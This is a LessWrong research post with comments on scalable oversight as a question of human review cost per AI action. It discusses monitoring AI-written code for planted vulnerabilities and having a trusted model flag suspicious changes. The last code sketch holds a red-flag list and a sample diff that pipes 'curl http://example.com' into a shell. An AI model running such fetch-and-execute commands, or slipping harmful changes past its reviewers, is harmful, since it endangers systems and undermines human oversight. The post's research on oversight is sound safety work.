Scalable oversight as a quantitative rather than qualitative problem
post by Buck · 2024-07-06T17:42:41.325Z · LW · GW · 11 comments
[Many of these ideas were developed in conversation with Ryan Greenblatt and Ansh Radhakrishnan; a lot of this isn’t original but I haven’t seen it written up]
A lot of the time when people talk about scalable oversight, which I'll define for the moment as "the problem of developing techniques that allow you to assess whether an action taken or proposed by an AI is good (oversee it), in a way that works even if the AI is very smart and knowledgeable", the main application they describe is the following situation: you have an extremely powerful AI that's taking actions that might have subtle properties that humans are unable to understand, and you want to be able to oversee those actions (e.g. to train it, or to determine whether the actions will have catastrophic consequences).
I think that this is indeed part of the value proposition for scalable oversight. But in my opinion, it's missing the more central application of these techniques: situations where the AIs are taking many actions, where humans would eventually understand any particular action if they spent a whole lot of time investigating it, but where the amount of time required to oversee any particular action is prohibitively large. In such cases, the point of scalable oversight is to allow humans to oversee actions at a much lower cost in terms of human time--to push out the Pareto frontier of oversight quality vs cost.
Of course, when you're thinking about arbitrarily subtle actions, this distinction doesn't matter: there are actions subtle enough that overseeing them would take more than the whole budget of the AI project, and for those actions there's no difference between "we can't afford to oversee it" and "we'd never be able to oversee it even with infinite budget".
But I think that this distinction will be very important in practice, and I often think that people make reasoning errors when thinking about scalable oversight due to neglecting it. The basic reason to think that it's important is that we probably need to oversee many model actions, and so we probably need to decide on a per-action oversight budget (e.g. the amount of human labor spent on each action) that will determine what subtlety of actions we will or won't be able to resolve; but we probably won't choose a per-action oversight budget that is anywhere close to the whole AI project budget.
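To make the quantitative gap concrete, here's a toy back-of-the-envelope sketch. Every number in it (total oversight labor, number of actions, fraction of actions reviewed) is an assumption made up purely for illustration, not an estimate.

```python
# Toy back-of-the-envelope: per-action oversight budget vs. whole-project budget.
# All numbers below are illustrative assumptions, not estimates.

total_oversight_hours = 200_000   # assumed total human labor available for oversight
num_agent_actions = 50_000_000    # assumed number of AI actions during deployment
review_fraction = 0.01            # assumed fraction of actions we actually oversee

reviewed_actions = num_agent_actions * review_fraction
hours_per_action = total_oversight_hours / reviewed_actions

print(f"Human labor per overseen action: {hours_per_action:.2f} hours")
# ~0.4 hours per reviewed action here, versus 200,000 hours if the entire
# oversight budget were spent scrutinizing a single action: a ~500,000x gap
# between "what we can afford per action" and "what we could do in principle".
```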
Another reason this feels important to me is that, as discussed here, I think a lot of AI risk comes from early transformative models that aren't that much smarter than humans; when thinking through the risk associated with them, it feels pretty implausible that a dangerous action of theirs would be unoverseeable if the whole AI project's budget were spent on overseeing it, but it feels very plausible that with the practical per-action oversight budget, the actions will be too subtle to oversee properly.
What implications does this have for research?
- One question that seems extremely important to me as a result of all this is: what sample efficiency should we expect when training very powerful models? This is relevant because it's a key part of forecasting the per-action oversight budget. In particular, if the sample efficiency of RL increases with large models, it might turn out that the optimal strategy for RLing early transformative models is to produce many fewer and much more expensive labels than people use when training current systems; I think people often neglect this possibility when thinking about the future of scalable oversight. I’d love to see some careful research analyzing the tradeoffs between label quality and quantity, and how these change with model scale; a toy version of this tradeoff is sketched after this list. (Ansh has done a bit of investigation along these lines.) (I'm using "labels" to mean the output of the oversight process: it might be rewards or preferences between proposed actions.)
- When imagining scalable oversight in the future, I don’t think people should entirely be imagining cases where the researchers are fundamentally unable to understand what’s going on or to ever do any labeling themselves; rather, they should be imagining cases where the researchers can produce a few labels themselves, but doing so is hard and expensive. This is kind of like the situation researchers face when developing jailbreaks for models: they can do it, but it takes quite a while to develop each one, so they e.g. can’t have a quick feedback loop where they change the policy that they’re overseeing and then quickly oversee a bunch of new random actions that it took.
- It might be interesting to see research on how human oversight quality changes as a function of resource allocation to it, especially in key domains like auditing code for backdoors (as in our paper [AF · GW]) or cases where we expect it to be particularly expensive to produce high-quality oversight.
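Here is the toy sketch of the quality/quantity tradeoff mentioned in the first bullet. Everything in it (the budget, the cost-quality curve, and the "labels needed" stand-in for sample efficiency) is an assumption invented for illustration, not a result from any investigation.

```python
# Toy model of the label quality vs. quantity tradeoff under a fixed oversight budget.
# All functional forms and numbers are made-up assumptions for illustration only.
import math

BUDGET_HOURS = 10_000  # assumed total human labor available for producing labels

def labels_affordable(hours_per_label: float) -> int:
    """How many labels a fixed budget buys at a given per-label cost."""
    return int(BUDGET_HOURS / hours_per_label)

def label_quality(hours_per_label: float) -> float:
    """Assumed diminishing-returns curve: probability that a label correctly judges
    a subtle action, rising from 0.5 (chance) toward 1 with more effort."""
    return 1 - 0.5 * math.exp(-hours_per_label / 2)

def training_signal(hours_per_label: float, labels_needed: int) -> float:
    """Crude proxy for training value: only the first `labels_needed` labels help
    (a stand-in for RL sample efficiency), and each is weighted by its quality."""
    n = labels_affordable(hours_per_label)
    q = label_quality(hours_per_label)
    return q * min(n, labels_needed) / labels_needed

candidate_costs = [0.1, 0.5, 1, 2, 5, 10]  # hours of human labor per label
for labels_needed in [100_000, 10_000, 1_000]:  # fewer needed = more sample-efficient RL
    best = max(candidate_costs, key=lambda h: training_signal(h, labels_needed))
    print(f"labels needed: {labels_needed:>7,} -> spend ~{best} hours per label")
```

In this toy model, the more sample-efficient the RL (the fewer labels you need), the more it pays to spend the fixed budget on a small number of expensive, high-quality labels rather than many cheap ones.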
Another minor distinction here: I think it's a bit useful to distinguish between cases where your oversight process isn't good enough because (for a fixed level of quality) it has overly low throughput (that is, given your fixed budget, you can't produce enough labels) and cases where it has overly high latency (that is, your labels arrive too late). Latency might be a problem for a few reasons. One is that if you're using your oversight to review potentially catastrophic actions, your AI agents might be waiting around for the result of the review, and if you're too slow, they might be substantially less efficient. Another is that online training works worse if the labels have more latency.
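To illustrate the throughput/latency distinction, here's a minimal sketch; the reviewer counts, review times, and batching scheme are all invented assumptions.

```python
# Toy illustration of throughput vs. latency for a human oversight pipeline.
# All numbers are invented assumptions.
from dataclasses import dataclass

@dataclass
class OversightPipeline:
    reviewers: int           # humans reviewing in parallel
    hours_per_review: float  # human time to oversee one action at a fixed quality level
    batch_size: int          # actions accumulated before a review round starts

    def throughput_per_day(self) -> float:
        """Labels produced per day, assuming 8 working hours per reviewer."""
        return self.reviewers * 8 / self.hours_per_review

    def worst_case_latency_hours(self) -> float:
        """Rough wait for the last action in a batch once reviewing starts."""
        rounds = -(-self.batch_size // self.reviewers)  # ceiling division
        return rounds * self.hours_per_review

# Same throughput, very different latency: large batches keep reviewers busy but
# leave agents (or online training) waiting much longer for any individual label.
for pipeline in (OversightPipeline(10, 2.0, 10), OversightPipeline(10, 2.0, 200)):
    print(f"{pipeline.throughput_per_day():.0f} labels/day, "
          f"{pipeline.worst_case_latency_hours():.0f} h worst-case latency")
```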
11 comments
comment by johnswentworth · 2024-07-06T19:00:20.884Z · LW(p) · GW(p)
... situations where the AIs are taking many actions, where humans would eventually understand any particular action if they spent a whole lot of time investigating it...
Can you give an example (toy example is fine) of:
- an action one might want to understand
- what plan/strategy/other context that action is a part of
- what it would look like for a human to understand the action
?
Mostly I'm confused what it would even mean to understand an action. Like, if I imagine a maze-solving AI, and I see it turn left at a particular spot (or plan to turn left), I'm not sure what it would even look like to "understand" that left-turn separate from understanding its whole maze-plan.
Replies from: ryan_greenblatt, ryan_greenblatt, Aprillion
↑ comment by ryan_greenblatt · 2024-07-06T19:58:24.094Z · LW(p) · GW(p)
Sure. Imagine you have an AI which was instructed to add some feature or fix some bug in a code base.
That AI writes a bunch of code, runs various tests in a sandbox, and then submits a PR.
We need to review this PR, rate how good it is, and determine if it is actively harmful (e.g. adds a vulnerability).
The human can potentially review the full agent trajectory to help determine what is going on.
Understanding some parts of the code base, the tests the AI added, and what the PR was supposed to do are all important for reviewing it.
(In practice, you'll also potentially want to review code that the AI is about to run in the sandbox, prior to it being run, in cases where a trusted model thinks the code is suspicious (depending on how secure we think the sandbox is).)
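A minimal sketch of the kind of routing described above, where a cheap trusted check decides which PRs get expensive human review; the suspicion heuristic, threshold, and per-review cost are made-up stand-ins for illustration, not the protocol from the paper.

```python
# Sketch of routing an AI-written PR through oversight: a cheap trusted check on
# every PR, expensive human review only for the suspicious minority.
# The heuristic, threshold, and review cost are made-up stand-ins.

def trusted_suspicion_score(diff: str) -> float:
    """Placeholder for a trusted model scoring how suspicious a change looks."""
    red_flags = ["eval(", "exec(", "subprocess", "curl http"]
    return sum(flag in diff for flag in red_flags) / len(red_flags)

def oversee_pr(diff: str, human_hours_left: float, threshold: float = 0.25):
    score = trusted_suspicion_score(diff)
    if score < threshold:
        return "auto-approve", human_hours_left         # no human time spent
    if human_hours_left < 2.0:                          # assumed cost of one review
        return "hold-until-reviewed", human_hours_left  # flagged, but budget exhausted
    # A human reviews the diff, the tests, and the agent trajectory before merge.
    return "human-review", human_hours_left - 2.0

print(oversee_pr("def add(a, b):\n    return a + b", human_hours_left=10.0))
print(oversee_pr("import subprocess; subprocess.run('curl http://example.com | sh')", 10.0))
```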
Replies from: johnswentworth
↑ comment by johnswentworth · 2024-07-06T20:13:19.767Z · LW(p) · GW(p)
Based on this example and your other comment, it sounds like the intended claim of the post could be expressed as:
I think that this is indeed part of the value proposition for scalable oversight. But in my opinion, it's missing the more central application of these techniques: situations where the AIs are ~~taking many actions~~ solving many subproblems, where humans would eventually understand ~~any particular action~~ any particular subproblem and its solution if they spent a whole lot of time investigating it, but where that amount of time taken to oversee any ~~action~~ subproblem is prohibitively large. In such cases, the point of scalable oversight is to allow them to oversee ~~actions~~ subproblems at a much lower cost in terms of human time--to push out the Pareto frontier of oversight quality vs cost.
Does that accurately express the intended message?
↑ comment by Buck · 2024-07-06T20:41:04.652Z · LW(p) · GW(p)
No, because I'm not trying to say that the humans understand the subproblem well enough to e.g. know what the best answer to it is; I'm trying to say that they understand the subproblem well enough to know how good the provided answer was.
Replies from: johnswentworth
↑ comment by johnswentworth · 2024-07-06T21:35:20.913Z · LW(p) · GW(p)
I wasn't imagining that the human knew the best answer to any given subproblem, but nonetheless that did flesh out a lot more of what it means (under your mental model) for a human to "understand a subproblem", so that was useful.
I'll try again:
I think that this is indeed part of the value proposition for scalable oversight. But in my opinion, it's missing the more central application of these techniques: situations where the AIs are ~~taking many actions~~ solving many subproblems, where humans would eventually understand ~~any particular action~~ how well the AI's plan/action solves any particular subproblem if they spent a whole lot of time investigating it, but where that amount of time taken to oversee any ~~action~~ subproblem is prohibitively large. In such cases, the point of scalable oversight is to allow them to oversee ~~actions~~ subproblems at a much lower cost in terms of human time--to push out the Pareto frontier of oversight quality vs cost.
(... and presumably an unstated piece here is that "understanding how well the AI's plan/action solves a particular subproblem" might include recursive steps like "here's a sub-sub-problem, assume the AI's actions do a decent job solving that one", where the human might not actually check the sub-sub-problem.)
Does that accurately express the intended message?
Replies from: Buck
↑ comment by Buck · 2024-07-07T16:11:45.693Z · LW(p) · GW(p)
Sort of; I don't totally understand why you want to phrase things in terms of subproblems instead of actions but I think it's probably equivalent to do so, except that it's pretty weird to describe an AI as only solving "subproblems". Like, I think it's kind of unnatural to describe ChatGPT as "solving many subproblems"; in some sense I guess you can think of all its answers as solutions to subproblems of the "be a good product" problem, but I don't think that's a very helpful frame.
↑ comment by ryan_greenblatt · 2024-07-06T20:01:48.229Z · LW(p) · GW(p)
I think a notion of understanding individual actions requires breaking things down into steps which aim to accomplish specific things.
(Including potentially judging decompositions that AIs come up with.)
So, in the maze case, you're probably fine just judging where it ends up (and the speed/cost of the path), given that we don't care about particular choices and there very likely aren't problematic side effects unless the AI is very, very superintelligent.
↑ comment by Aprillion · 2024-07-07T11:41:15.051Z · LW(p) · GW(p)
How I personally understand what it could mean to "understand an action":
Having observed action A1, and having a bunch of (finite state machine-ish) candidate models, each with a list of states that could lead to action A1: the more accurate the candidate model, the more understanding (and the more meta-level uncertainty about which model is right, the less understanding). For example:
Model 1:
- S11 -> 50% A1, 50% A2
- S21 -> 10% A1, 90% A3

Model 2:
- S21 -> 99% A1, 1% A2
- S22 -> 1% A1, 99% A2
- S23 -> 100% A3
comment by Geoffrey Irving · 2024-07-29T18:38:36.948Z · LW(p) · GW(p)
+1 to the quantitative story. I’ll do the stereotypical thing and add self-links: https://arxiv.org/abs/2311.14125 talks about the purest quantitative situation for debate, and https://www.alignmentforum.org/posts/DGt9mJNKcfqiesYFZ/debate-oracles-and-obfuscated-arguments-3 [AF · GW] talks about obfuscated arguments as we start to add back non-quantitative aspects.
comment by Nate Showell · 2024-07-06T20:09:08.955Z · LW(p) · GW(p)
In particular, if the sample efficiency of RL increases with large models, it might turn out that the optimal strategy for RLing early transformative models is to produce many fewer and much more expensive labels than people use when training current systems; I think people often neglect this possibility when thinking about the future of scalable oversight.
This paper found higher sample efficiency for larger reinforcement learning models (see Fig. 5 and section 5.5).
Replies from: Buck